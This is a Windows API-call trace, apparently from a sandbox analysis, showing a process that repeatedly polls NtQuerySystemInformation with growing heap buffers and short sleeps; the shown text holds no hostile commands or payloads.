[0196.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.098] Sleep (dwMilliseconds=0x110) [0196.134] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.134] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.135] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.135] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.135] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.136] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.136] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.136] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.136] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.136] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.136] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.137] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.233] Sleep (dwMilliseconds=0x110) [0196.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.256] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.256] Sleep (dwMilliseconds=0x110) [0196.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.273] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.273] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.274] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.274] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.275] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.275] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.275] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.276] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.281] Sleep (dwMilliseconds=0x110) [0196.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.303] Sleep (dwMilliseconds=0x110) [0196.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.340] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.348] Sleep (dwMilliseconds=0x110) [0196.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.365] Sleep (dwMilliseconds=0x110) [0196.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.382] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.382] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.386] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.387] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.390] Sleep (dwMilliseconds=0x110) [0196.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.434] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.434] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.438] Sleep (dwMilliseconds=0x110) [0196.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.453] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.455] Sleep (dwMilliseconds=0x110) [0196.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.473] Sleep (dwMilliseconds=0x110) [0196.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.493] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.493] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.494] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.494] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.494] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.494] Sleep (dwMilliseconds=0x110) [0196.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.505] Sleep (dwMilliseconds=0x110) [0196.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.518] 